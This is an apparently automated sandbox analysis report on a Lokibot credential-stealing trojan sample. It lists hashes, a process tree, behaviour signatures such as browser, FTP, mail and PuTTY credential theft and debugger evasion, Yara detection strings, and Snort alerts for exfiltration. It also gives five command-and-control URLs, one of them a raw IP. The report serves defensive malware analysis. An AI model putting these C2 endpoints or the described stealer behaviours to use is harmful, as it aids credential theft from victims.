Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Trojan.DownloaderNET.131.2724.22120

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.DownloaderNET.131.2724.22120 (renamed file extension from 22120 to exe)
Analysis ID:368924
MD5:968e090b17ce57156a66188b4db032ba
SHA1:de2b8b3bf2024cf8a3bdd7ede0ce86bb5a7b13de
SHA256:62562b38c8055ca3d5143c759d1fe6e946e0b3a85bf4397b056589d3c271392c
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Lokibot
Binary contains a suspicious time stamp
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe (PID: 2576 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe' MD5: 968E090B17CE57156A66188B4DB032BA)
    • cmd.exe (PID: 4176 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 3896 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • WerFault.exe (PID: 5944 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2576 -s 2120 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://87.251.79.157/m0ha/0/pin.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x142bf:$des3: 68 03 66 00 00
        • 0x186b0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x1877c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 17 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0x13e78:$s1: http://
          • 0x17633:$s1: http://
          • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
          • 0x13e80:$s2: https://
          • 0x13e78:$f1: http://
          • 0x17633:$f1: http://
          • 0x13e80:$f2: https://
          0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpackLoki_1Loki Payloadkevoreilly
                • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                • 0x13ffc:$a2: last_compatible_version
                Click to see the 25 entries

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://87.251.79.157/m0ha/0/pin.php"]}
                Multi AV Scanner detection for submitted fileShow sources
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeVirustotal: Detection: 42%Perma Link
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeReversingLabs: Detection: 17%
                Machine Learning detection for sampleShow sources
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeJoe Sandbox ML: detected
                Source: unknownHTTPS traffic detected: 172.67.197.219:443 -> 192.168.2.5:49692 version: TLS 1.0
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: Microsoft.VisualBasic.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.ni.pdb% source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.ni.pdb" source: WerFault.exe, 00000008.00000003.283574346.0000000005678000.00000004.00000001.sdmp
                Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000008.00000003.271419527.0000000003392000.00000004.00000001.sdmp
                Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000008.00000003.283770641.0000000005630000.00000004.00000040.sdmp
                Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb source: WerFault.exe, 00000008.00000003.271165162.0000000003386000.00000004.00000001.sdmp
                Source: Binary string: winnsi.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: ml.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: .ni.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: clr.pdb source: WerFault.exe, 00000008.00000003.283770641.0000000005630000.00000004.00000040.sdmp
                Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: advapi32.pdb source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: schannel.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: urlmon.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: System.Configuration.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000008.00000003.271182721.0000000003398000.00000004.00000001.sdmp
                Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: System.Xml.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.Xml.pdbx source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: System.Core.pdb`Q source: WERC8B4.tmp.dmp.8.dr
                Source: Binary string: indows.Forms.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.PDB source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.297556952.0000000000EF8000.00000004.00000010.sdmp
                Source: Binary string: WLDP.pdb: source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: mscoree.pdb source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: bcrypt.pdbH source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: iertutil.pdbX source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Xml.ni.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: shlwapi.pdbk source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: msvcp_win.pdbT source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: nsi.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: powrprof.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: mscorlib.ni.pdbRSDS source: WERC8B4.tmp.dmp.8.dr
                Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: shell32.pdbR source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: ole32.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: profapi.pdb| source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: cryptsp.pdbF source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: mscorlib.pdb* source: WERC8B4.tmp.dmp.8.dr
                Source: Binary string: iertutil.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: cldapi.pdb< source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: msasn1.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: ml.pdbLL' source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: mscorlib.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: combase.pdb source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: mscorlib.ni.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000008.00000003.271419527.0000000003392000.00000004.00000001.sdmp
                Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WERC8B4.tmp.dmp.8.dr
                Source: Binary string: wimm32.pdb^ source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: ncrypt.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: secur32.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: rasman.pdbv source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: apphelp.pdb source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.PDB source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.297556952.0000000000EF8000.00000004.00000010.sdmp
                Source: Binary string: System.Xml.ni.pdbRSDS source: WERC8B4.tmp.dmp.8.dr
                Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.Core.ni.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: ml.ni.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.Core.ni.pdbRSDSD source: WERC8B4.tmp.dmp.8.dr
                Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: wmswsock.pdbl source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: mscoreei.pdbk source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: mscorlib.pdbx source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: shcore.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: rasadhlp.pdb" source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: ncryptsslp.pdb. source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000008.00000003.283770641.0000000005630000.00000004.00000040.sdmp
                Source: Binary string: fltLib.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: shell32.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: nsi.pdbx source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: fwpuclnt.pdbB source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: wimm32.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: c.pdbis source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.297556952.0000000000EF8000.00000004.00000010.sdmp
                Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: diasymreader.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: winhttp.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: ntasn1.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: rtutils.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.pdbx source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000008.00000003.271165162.0000000003386000.00000004.00000001.sdmp
                Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: profapi.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000008.00000003.283770641.0000000005630000.00000004.00000040.sdmp
                Source: Binary string: WLDP.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: sechost.pdb source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: System.ni.pdbRSDS source: WERC8B4.tmp.dmp.8.dr
                Source: Binary string: clrjit.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: rasman.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: propsys.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: crypt32.pdb$ source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: jVisualBasic.pdb source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.297556952.0000000000EF8000.00000004.00000010.sdmp
                Source: Binary string: version.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: onfiguration.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: wintrust.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: ore.ni.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: System.pdb source: WerFault.exe, 00000008.00000003.283574346.0000000005678000.00000004.00000001.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: ore.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: System.Windows.Forms.pdbl source: WERC8B4.tmp.dmp.8.dr
                Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000008.00000003.283770641.0000000005630000.00000004.00000040.sdmp
                Source: Binary string: System.ni.pdbT3?l source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: psapi.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.Configuration.ni.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: dnsapi.pdb0 source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: cldapi.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.Core.pdbx source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000008.00000003.271182721.0000000003398000.00000004.00000001.sdmp
                Source: Binary string: System.Core.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: rtutils.pdbx source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: cryptbase.pdb` source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: combase.pdbk source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: System.Core.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: .pdbJ source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.297556952.0000000000EF8000.00000004.00000010.sdmp
                Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: wuser32.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.ni.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: edputil.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: crypt32.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.Windows.Forms.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49696 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49696 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49696 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49696 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49697 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49697 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49697 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49697 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49698 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49698 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49698 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49698 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49698
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49699 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49699 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49699 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49699 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49699
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49700 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49700 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49700 -> 87.251.79.157:80
